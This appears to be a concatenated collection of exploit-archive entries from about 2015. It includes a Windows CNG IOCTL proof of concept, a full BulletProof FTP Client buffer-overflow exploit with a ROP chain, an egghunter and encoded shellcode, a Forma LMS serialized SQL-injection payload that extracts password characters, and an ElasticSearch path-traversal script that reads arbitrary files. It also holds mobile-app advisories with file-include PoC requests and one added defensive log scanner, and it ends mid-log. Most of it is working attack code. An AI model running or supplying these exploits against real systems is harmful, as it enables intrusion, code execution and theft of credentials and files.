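    """True when the header block is abnormally large or one name repeats
    abnormally often. Both limits are assumptions to tune against real
    traffic; legitimate repeats (Cookie, Via) rarely exceed a handful."""
    total, counts = header_stats(raw)
    if total > max_total:
        return True
    return any(n > max_repeat for n in counts.values())


if __name__ == "__main__":
    for label, req in (("normal", NORMAL_REQUEST), ("uaf", UAF_REQUEST)):
        total, _ = header_stats(req)
        print(label, total, most_repeated(req), is_header_flood(req))
```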
            
// Source: http://www.binvul.com/viewthread.php?tid=508
// Source: https://twitter.com/NTarakanov/status/598370525132423168


#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#include <stdlib.h>
#pragma  comment(lib, "ntdll.lib")

#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

int main(int argc, CHAR* argv[]) {
        typedef NTSTATUS  (__stdcall *NT_OPEN_FILE)(OUT PHANDLE FileHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG ShareAccess, IN ULONG OpenOptions);
        NT_OPEN_FILE NtOpenFileStruct;

        HMODULE hModule = LoadLibraryA("ntdll.dll");
        if(hModule == NULL) {
                exit(-1);
        }
        NtOpenFileStruct = (NT_OPEN_FILE)GetProcAddress(hModule, "NtOpenFile");
        if(NtOpenFileStruct == NULL) {
                exit(-1);
        }

        /* native object-manager path of the CNG kernel device */
        UNICODE_STRING filename;
        RtlInitUnicodeString(&filename, L"\\Device\\CNG");

        OBJECT_ATTRIBUTES obja;
        obja.Length                     = sizeof(OBJECT_ATTRIBUTES); /* 0x18 on x86, 0x30 on x64 */
        obja.RootDirectory              = NULL;
        obja.ObjectName                 = &filename;
        obja.Attributes                 = 0x40;                      /* OBJ_CASE_INSENSITIVE */
        obja.SecurityDescriptor         = NULL;
        obja.SecurityQualityOfService   = NULL;

        IO_STATUS_BLOCK iostatusblock;
        HANDLE hCNG   = NULL;
        /* DesiredAccess 0x100001 = SYNCHRONIZE | FILE_READ_DATA,
           ShareAccess 7 = read/write/delete, OpenOptions 0x20 = FILE_SYNCHRONOUS_IO_NONALERT */
        NTSTATUS stat = NtOpenFileStruct(&hCNG, 0x100001, &obja, &iostatusblock, 7, 0x20);
        if(NT_SUCCESS(stat)) {
                printf("File successfully opened.\n");
        }
        else {
                printf("File could not be opened.\n");
                return -1;
        }

        /* IOCTL 0x390048 with a single 4-byte in/out buffer */
        DWORD dwBuffer = 0;
        DWORD dwCnt    = 0;
        BOOL  bRet = DeviceIoControl(hCNG, 0x390048, &dwBuffer, 4, &dwBuffer, 4, &dwCnt, NULL);
        if (FALSE == bRet)
        {
                printf("[*]Send IOCTL fail!\n");
                printf("[*]Error Code:%d\n", GetLastError());
        }
        else
        {
                printf("[*]0x%08x\n", dwBuffer);
        }
        CloseHandle(hCNG);
        getchar();
        return 0;
}
            
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH)          #
# Date: Feb 15 2015                                                           #
# Exploit Author: Gabor Seljan                                                #
# Software Link: http://www.bpftp.com/                                        #
# Version: 2010.75.0.76                                                       #
# Tested on: Windows XP SP3 English                                           #
# Credits: His0k4                                                             #
# CVE: CVE-2008-5753                                                          #
#-----------------------------------------------------------------------------#

#!/usr/bin/python

from struct import pack

# offset to SEH is 93 byte
buf  = b'A' * 13
buf += pack('<L',0x77c1f62f)          # POP ECX # POP ECX # POP EDI # POP EBX # POP EBP # RETN [msvcrt.dll]
buf += b'A' * 20
buf += pack('<L',0x74c86a99)          # POP ESI # RETN [oleacc.dll]
buf += b'A' * 4
buf += pack('<L',0x77c4dca8)          # ADD ESP,2C # RETN [msvcrt.dll]
buf += b'A' * 18
buf += pack('<L',0x77c1c47f)          # POP EBX # POP EBP # RETN 10 [msvcrt.dll]
buf += b'A' * 8
buf += pack('<L',0x74c86a9a)          # RETN [oleacc.dll]
buf += b'A' * 10
buf += b'\xce\xc3\x40'                # ADD ESP,400 # POP ESI # POP EBX # RETN [bpftpclient.exe]

# ROP chain
rop_gadgets  = b''
rop_gadgets += pack('<L',0x77c364d5)  # POP EBP # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c364d5)  # skip 4 bytes [msvcrt.dll]
rop_gadgets += pack('<L',0x77c21d16)  # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0xfffffafe)  # Value to negate, will become 0x00000501
rop_gadgets += pack('<L',0x7ca82222)  # NEG EAX # RETN [shell32.dll]
rop_gadgets += pack('<L',0x77227494)  # XCHG EAX,EBX # RETN [WININET.dll]
rop_gadgets += pack('<L',0x77c21d16)  # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0xffffffc0)  # Value to negate, will become 0x00000040
rop_gadgets += pack('<L',0x771bcbe4)  # NEG EAX # RETN [WININET.dll]
rop_gadgets += pack('<L',0x77f124c8)  # XCHG EAX,EDX # RETN [GDI32.dll]
rop_gadgets += pack('<L',0x77c2c343)  # POP ECX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c605b5)  # &Writable location [msvcrt.dll]
rop_gadgets += pack('<L',0x77c23b47)  # POP EDI # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c39f92)  # RETN (ROP NOP) [msvcrt.dll]
rop_gadgets += pack('<L',0x77c34d9a)  # POP ESI # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c2aacc)  # JMP [EAX] [msvcrt.dll]
rop_gadgets += pack('<L',0x77c21d16)  # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c11120)  # ptr to &VirtualProtect() [IAT msvcrt.dll]
rop_gadgets += pack('<L',0x77c12df9)  # PUSHAD # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c35524)  # ptr to 'push esp #  ret ' [msvcrt.dll]


# heap-only egghunter
hunter  = b'\x6a\x30\x5a'             # PUSH 30 # POP EDX
hunter += b'\x64\x8b\x12'             # MOV EDX, DWORD PTR FS:[EDX]
hunter += b'\x80\xc2\x90'             # ADD DL,90
hunter += b'\x8b\x12'                 # MOV EDX, DWORD PTR [EDX]
hunter += b'\x8b\x12'                 # MOV EDX, DWORD PTR [EDX]
hunter += b'\xeb\x05'                 # JMP SHORT
hunter += b'\x66\x81\xca\xff\x0f'     # OR DX,0FFF
hunter += b'\x42\x52'                 # INC EDX # PUSH EDX
hunter += b'\x6a\x02\x58'             # PUSH 2 # POP EAX
hunter += b'\xcd\x2e'                 # INT 2E
hunter += b'\x3c\x05'                 # CMP AL,5
hunter += b'\x5a'                     # POP EDX
hunter += b'\x74\xef'                 # JE SHORT
hunter += b'\xb8\x77\x30\x30\x74'     # MOV EAX, w00t
hunter += b'\x89\xd7'                 # MOV EDI,EDX
hunter += b'\xaf'                     # SCAS DWORD PTR ES:[EDI]
hunter += b'\x75\xea'                 # JNZ SHORT
hunter += b'\xaf'                     # SCAS DWORD PTR ES:[EDI]
hunter += b'\x75\xe7'                 # JNZ SHORT

# copy shellcode back to stack
strcpy  = b'\x8b\xec'                 # MOV EBP,ESP
strcpy += b'\x57\x55\x55'             # PUSH EDI # PUSH EBP # PUSH EBP
strcpy += b'\x68\x30\x60\xc4\x77'     # PUSH ptr to &strcpy [msvcrt.dll]
strcpy += b'\xc3'                     # RET

egg = 'w00t'.encode()

# msfvenom -p windows/exec -b '\x00\x0d\x0a\x1a' -e x86/shikata_ga_nai cmd=calc.exe
shellcode  = b''
shellcode += b'\xdb\xd1\xb8\xda\x92\x2c\xca\xd9\x74\x24\xf4\x5a\x31'
shellcode += b'\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xce\x70'
shellcode += b'\xd9\x36\x06\xf6\x22\xc7\xd6\x97\xab\x22\xe7\x97\xc8'
shellcode += b'\x27\x57\x28\x9a\x6a\x5b\xc3\xce\x9e\xe8\xa1\xc6\x91'
shellcode += b'\x59\x0f\x31\x9f\x5a\x3c\x01\xbe\xd8\x3f\x56\x60\xe1'
shellcode += b'\x8f\xab\x61\x26\xed\x46\x33\xff\x79\xf4\xa4\x74\x37'
shellcode += b'\xc5\x4f\xc6\xd9\x4d\xb3\x9e\xd8\x7c\x62\x95\x82\x5e'
shellcode += b'\x84\x7a\xbf\xd6\x9e\x9f\xfa\xa1\x15\x6b\x70\x30\xfc'
shellcode += b'\xa2\x79\x9f\xc1\x0b\x88\xe1\x06\xab\x73\x94\x7e\xc8'
shellcode += b'\x0e\xaf\x44\xb3\xd4\x3a\x5f\x13\x9e\x9d\xbb\xa2\x73'
shellcode += b'\x7b\x4f\xa8\x38\x0f\x17\xac\xbf\xdc\x23\xc8\x34\xe3'
shellcode += b'\xe3\x59\x0e\xc0\x27\x02\xd4\x69\x71\xee\xbb\x96\x61'
shellcode += b'\x51\x63\x33\xe9\x7f\x70\x4e\xb0\x15\x87\xdc\xce\x5b'
shellcode += b'\x87\xde\xd0\xcb\xe0\xef\x5b\x84\x77\xf0\x89\xe1\x88'
shellcode += b'\xba\x90\x43\x01\x63\x41\xd6\x4c\x94\xbf\x14\x69\x17'
shellcode += b'\x4a\xe4\x8e\x07\x3f\xe1\xcb\x8f\xd3\x9b\x44\x7a\xd4'
shellcode += b'\x08\x64\xaf\xb7\xcf\xf6\x33\x16\x6a\x7f\xd1\x66'

identifier = b'This is a BulletProof FTP Client Session-File and should not be modified directly.'
host       = buf
port       = b'21'
name       = b'B' + rop_gadgets + hunter + strcpy
password   = b'bpfmcidchffddknejf'
local      = egg + egg + shellcode

sploit     = b"\r\n".join([identifier, host, port, name, password, local])

try:
  print('[*] Creating exploit file...')
  f = open('sploit.bps', 'wb')
  f.write(sploit)
  f.close()
  print('[*] sploit.bps file successfully created!')
except:
  print('[!] Error while creating exploit file!')
            
Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities

[+] Author: Filippo Roncari
[+] Target: Forma LMS 
[+] Version: 1.3 and probably lower
[+] Vendor: http://www.formalms.org
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf
[+] Info: f.roncari@securenetwork.it / f@unsec.it


[+] Summary
Forma LMS is a corporate oriented Learning Management System, used to manage and deliver online training courses. Forma LMS is SCORM compliant with enterprise class features like multi-client architecture, custom report generation, native ecommerce and catalogue management, integration API, and more.


[+] Vulnerability Details
Forma LMS 1.3 is prone to multiple PHP Object Injection vulnerabilities, due to a repeated unsafe use of the unserialize() function, which allows unprivileged users to inject arbitrary PHP objects. A potential attacker could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input, in order to execute code on the remote server or abuse arbitrary functionalities.


[+] Technical Details
See full advisory at https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf for the list of identified OI flaws and further technical details.


[+] Proof of Concept (PoC)
The following PoC shows how to abuse the unsafe unserialize() called in writemessage() function in order to trigger a SQL injection flaw. This is an alternative way to exploit one of the identified OI, since a quick check did not highlight useful magic methods. The PoC as well as the other identified vulnerabilities are further detailed in the full advisory. 


	[!] PoC Payload
	----------------------------
	a:2:{i:0;s:122:"0) union select if(substring(pass,1,1) = char(53),benchmark(5000000,encode(1,2)),null) from core_user where idst=11836-- ";i:1;s:1:"1";}
	----------------------------

	[!] PoC Request
	----------------------------
	POST /formalms/appLms/index.php?modname=message&op=writemessage HTTP/1.1
	Host: localhost
	Cookie: docebo_session=91853e7eca413578de70304f94a43fe1
	Content-Type: multipart/form-data; boundary=---------------------------1657367614367103261183989796 
	Content-Length: 1453

	[...]

	-----------------------------1657367614367103261183989796 
	Content-Disposition: form-data; name="message[recipients]"

	a%3A2%3A%7Bi%3A0%3Bs%3A122%3A%220%29+union+SELECT+IF%28SUBSTRING%28pass%2C1%2C1%29+%3D+char%2853%29%2Cbenchmark%285000000%2Cencode%281%2C2%29%29%2Cnull%29+from+core_user+where+idst%3D11836--++%22%3Bi%3A1%3Bs%3A1%3A%221%22%3B%7D

	[...]
	--------------------------



[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
            
#!/usr/bin/python
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/
#
# Source: https://github.com/pandujar/elasticpwn/

import socket, sys

print "!dSR ElasticPwn - for CVE-2015-3337\n"
if len(sys.argv) <> 3:
        print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
        sys.exit()

port = 9200 # Default ES http port
host = sys.argv[1]
fpath = sys.argv[2]

def grab(plugin):
    socket.setdefaulttimeout(3)
    s = socket.socket()
    s.connect((host,port))
    s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
           "Host: %s\n\n" % (plugin, fpath, host))
    file = s.recv(2048)
    print "\t[*] Trying to retrieve %s:" % fpath
    if ("HTTP/1.0 200 OK" in file):
        print "\n%s" % file
    else:
        print "[-] File Not Found, No Access Rights or System Not Vulnerable"

def pfind(plugin):
    try:
        socket.setdefaulttimeout(3)
        s = socket.socket()
        s.connect((host,port))
        s.send("GET /_plugin/%s/ HTTP/1.0\n"
               "Host: %s\n\n" % (plugin, host))
        file = s.recv(16)
        print "[*] Trying to find plugin %s:" % plugin
        if ("HTTP/1.0 200 OK" in file):
            print "[+] Plugin found!"
            grab(plugin)
            sys.exit()
        else:
            print "[-]  Not Found "
    except Exception, e:
        print "[-] Error connecting to %s: %s" % (host, e)
        sys.exit()

# Include more plugin names to check if they are installed
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']

for plugin in pluginList:
	pfind(plugin)
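As an added defensive counterpart to the PoC above (this is not part of the original script or of the elasticpwn project): a scanner that reads HTTP access-log lines and flags requests to `/_plugin/<name>/` whose normalized path escapes the plugin directory, which is the traversal pattern CVE-2015-3337 describes. It assumes a combined-format access log, for instance from a reverse proxy in front of Elasticsearch; the sample lines are constructed and the function names are this example's own.

```python
"""Scan HTTP access logs for /_plugin/ path traversal (CVE-2015-3337 pattern).
Added defensive example; the log lines below are constructed, not real traffic."""
import posixpath
import re
from urllib.parse import unquote

# Request line and status of a combined-format access log entry, e.g.
# ... "GET /_plugin/head/ HTTP/1.0" 200 1523
_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def _decode(target):
    """Drop the query string and percent-decode. The loop is bounded, so a
    doubly encoded '%252e%252e' is undone too without any risk of spinning."""
    path = target.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def normalize_path(target):
    """Collapse '.' and '..' segments. posixpath.normpath clamps at '/', so
    '/_plugin/head/../../../../etc/passwd' becomes '/etc/passwd', which is how a
    server that does not check for escape would resolve it."""
    return posixpath.normpath(_decode(target))


def is_plugin_traversal(target):
    """True when the request names a plugin (/_plugin/<name>/...) but its
    normalized path is no longer inside /_plugin/<name>: the '..' segments
    escaped the plugin directory."""
    parts = _decode(target).split("/")
    if len(parts) < 3 or parts[1] != "_plugin" or not parts[2]:
        return False
    plugin_root = "/_plugin/" + parts[2]
    norm = normalize_path(target)
    return not (norm == plugin_root or norm.startswith(plugin_root + "/"))


def scan_access_log(lines):
    """One record per suspicious request. 'served' is True for a 200 response,
    i.e. the file was actually returned and the event is a confirmed read,
    not just an attempt."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = _REQ_RE.search(line)
        if m and is_plugin_traversal(m.group("target")):
            hits.append({
                "line": lineno,
                "client": line.split(" ", 1)[0],
                "method": m.group("method"),
                "path": normalize_path(m.group("target")),
                "status": int(m.group("status")),
                "served": m.group("status") == "200",
            })
    return hits


# Constructed sample: lines 2 and 3 are traversal attempts (3 is double encoded
# and was blocked), the others are ordinary plugin and API traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/May/2015:10:01:02 +0000] "GET /_plugin/head/ HTTP/1.0" 200 1523',
    '10.0.0.5 - - [21/May/2015:10:01:03 +0000] "GET /_plugin/head/../../../../../../etc/passwd HTTP/1.0" 200 2048',
    '10.0.0.9 - - [21/May/2015:10:02:10 +0000] "GET /_plugin/kopf/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 403 0',
    '10.0.0.7 - - [21/May/2015:10:03:00 +0000] "GET /_cluster/health HTTP/1.1" 200 389',
    '10.0.0.7 - - [21/May/2015:10:03:05 +0000] "GET /_plugin/bigdesk/index.html?x=1 HTTP/1.1" 200 7712',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

The check deliberately decodes before normalizing: a single `unquote` would miss the doubly encoded form, and a naive substring search for `..` would miss `%2e%2e` entirely. Treating a 200 differently from a 403 matters for triage, since only the former means the host actually disclosed the file.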
            
Document Title:
===============
Wireless Photo Transfer v3.0 iOS - File Include Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1492


Release Date:
=============
2015-05-12


Vulnerability Laboratory ID (VL-ID):
====================================
1492


Common Vulnerability Scoring System:
====================================
6.5


Product & Service Introduction:
===============================
Transfer your photo without usb. The best wireless photo transfer app on the App Store.

(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/wireless-photo-transfer/id900376882 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the official wireless photo transfer mobile v3.0 iOS application.


Vulnerability Disclosure Timeline:
==================================
2015-05-12: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Yan Xing
Product: Wireless Photo Transfer - iOS Mobile Web Application 3.0


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official wireless photo transfer mobile v3.0 iOS application.
The file include vulnerability allows remote attackers to include unauthorized local file/path requests or system-specific 
path commands to compromise the mobile web-application.

The web vulnerability is located in the `album-title` value of the `file upload` module. Remote attackers are able to inject 
own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. 
The local file/path include execution occurs in the index file dir listing and sub folders of the wifi interface. The attacker 
is able to inject the lfi payload by using the wifi interface or the local file sync function. Attackers are also able to exploit 
the filename issue in combination with persistent injected script code to execute different malicious attack requests. The attack 
vector is located on the application-side of the wifi service and the request method to inject is POST. 

The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5. 
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. 
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.

Request Method(s):
				[+] [POST]

Vulnerable Module(s):
				[+] Submit (Upload)

Vulnerable Parameter(s):
				[+] filename (album-title)

Affected Module(s):
				[+] Index File Dir Listing (http://localhost:80/)


Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: #1 Index File Dir Listing (album-title)

<div class="album-folder">
<div class="album-number">2 items</div>
<div class="album-title">../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]<a></a></div><a>
</a><a href="/group/2/0/100"><img class="album-overlay" alt="" src="/cvab-overlay.png" height="160" width="140">
<img class="album-thumb" alt="" src="/api/group/poster/2" height="90" width="90"></a>
<div class="album-folder-img"><img alt="" src="/cvab.png" height="160" width="140"></div>
</div>


PoC: #2 Topic Album (Album Title - album_info_intro_driver)

<div class="top-section">
            <div id="intro">
                <div class="divider">
                    <h1 class="strong" id="album_info_intro_driver">../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]<a>(0-2)</a></h1><a>
                    <div class="pagination"></div>
                </a></div><a>
            </a></div><a>
            
            </a><div class="centered"><a>
                </a><a class="button-2 ui-glossy rad-l" href="javascript:location.reload(true)">Refresh</a>
                <a class="button-2 ui-glossy rad-r" href="javascript:downloadAllSelection()">Download ZIP</a>
            </div>
        </div>


--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:80/upload.html 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:80]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:80/groups]
      Connection[keep-alive]
   POST-Daten:
      POST_DATA[-----------------------------8397114799830
Content-Disposition: form-data; name="upload1"; filename="../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]pentesting.png"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:80/ 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[210] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:80]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Connection[keep-alive]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[210]
      Connection[keep-alive]
      Date[Sat, 09 May 2015 15:21:30 GMT]



Reference(s):
http://localhost:80/groups
http://localhost:80/upload.html


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable album-title value. Encode also the local app input field for sync. 
Restrict the filename input and disallow special chars to prevent further arbitrary file upload attacks. Filter and encode also the vulnerable output 
values in the mobile wifi interface (file dir) application.


Security Risk:
==============
The security risk of the local file include web vulnerability in the wifi network interface album-title value is estimated as high. (CVSS 6.5)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
            
Document Title:
===============
OYO File Manager 1.1 iOS&Android - Multiple Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1494


Release Date:
=============
2015-05-18


Vulnerability Laboratory ID (VL-ID):
====================================
1493


Common Vulnerability Scoring System:
====================================
6.9


Product & Service Introduction:
===============================
OYO File Manager, helps you to manage files in your mobile from your computer over wifi, without USB cable. Also, view your photo albums, play songs and videos. 
Store files in drive page and do all the file operations, such as Create, Move, Delete, Edit, Copy, Rename, Zip, unzip, and get information about file.

(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/oyo-file-manager/id981145759 & https://play.google.com/store/apps/details?id=com.whatbig.filemanager )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research team discovered multiple vulnerabilities in the official OYO File Manager v1.1 iOS & Android mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2015-05-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Balaji Rajan
Product: OYO File Manager - iOS & Android 1.1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
1.1 Local File Include Vulnerability
A local file include web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application.
The file include vulnerability allows remote attackers to include unauthorized local file/path requests to compromise the mobile web-application.

The web vulnerability is located in the `filename` value of the `upload(GCDWebUploader)` module. Attackers are able to inject own files with malicious 
`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occurs in 
the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the local file include request by using the 
`wifi interface` in connection with the vulnerable file upload POST method request. Injects are also possible via the local file sync function. 
Local attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious 
attack requests.

The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5. 
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. 
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.

Request Method(s):
				[+] [POST]

Vulnerable Module(s):
				[+] upload (GCDWebUploader)

Vulnerable Parameter(s):
				[+] filename

Affected Module(s):
				[+] Index File Dir Listing (http://localhost:8080/)


1.2 Local Command Injection Vulnerability
A local command inject web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application.
The issue allows remote attackers to inject own commands by usage of stable device values to compromise the ios or android mobile web-application.

The command inject vulnerability is located in the vulnerable `devicename` value of the `index` module. Local attackers are able to inject 
own malicious system specific commands into the vulnerable `devicename` value. The devicename value is displayed in the header location 
of the file dir index module. The execution point is in the main index context and the injection point is the local device to app sync.

The attack vector is located on the application-side and the injection requires physical device access or a local low privileged device user account. 
Local attackers are also able to exploit the devicename validation issue in combination with persistent injected script codes.

The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6. 
Exploitation of the command/path inject vulnerability requires a low privileged ios/android device account with restricted access and no user interaction. 
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands to compromise the mobile Android/iOS application 
or the connected device components.

Request Method(s):
				[+] [SYNC]

Vulnerable Module(s):
				[+] Path Listing
 
Vulnerable Parameter(s):
				[+] devicename



1.3 Remote Path Traversal Vulnerability
A path traversal web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application.
The security vulnerability allows remote attackers to request unauthorized system path variables to compromise the mobile application or device.

The vulnerability is located in the `path` value of the `open and list` interface module. Remote attackers are able to change the path variable 
to unauthorized request device files or directories. The vulnerability can be exploited by local or remote attackers without user interaction. 
The attack vector is located on the application-side of the service and the request method to execute is GET (client-side).

The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. 
Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction. 
Successful exploitation of the vulnerability results in mobile application compromise.

Request Method(s):
				[+] GET

Vulnerable Module(s):
				[+] open
				[+] list

Vulnerable Parameter(s):
				[+] path

Affected Module(s):
				[+] Index File Dir Listing (http://localhost:8080/)


Proof of Concept (PoC):
=======================
1.1
The file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open the interface
2. Start a session tamper
3. Upload a random file
4. Change in the upload POST method request the vulnerable filename to a local file variable
Note: The website reloads
5. The execution occurs in the main file dir index where the upload has been replaced
6. Successful reproduce of the mobile web vulnerability!

--- PoC Session Logs [POST] ---

Status: 200[OK]
POST http://localhost/upload 
Load Flags[LOAD_BYPASS_CACHE  ] Größe des Inhalts[2] Mime Type[application/json]
   Request Header:
      Host[localhost]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[http://localhost/]
      Content-Length[831]
      Content-Type[multipart/form-data; boundary=---------------------------33361466725643]
      Connection[keep-alive]
      Pragma[no-cache]
      Cache-Control[no-cache]
   POST-Daten:
      POST_DATA[-----------------------------33361466725643
Content-Disposition: form-data; name="path"/test23/
-----------------------------33361466725643
Content-Disposition: form-data; name="files[]"; filename="../[LOCAL FILE INCLUDE VULNERABILITY!]testfile.png"
Content-Type: image/png
- Response
Status=OK - 200
Server=GCDWebUploader
Cache-Control=no-cache
Content-Length=2
Content-Type=application/json
Connection=Close
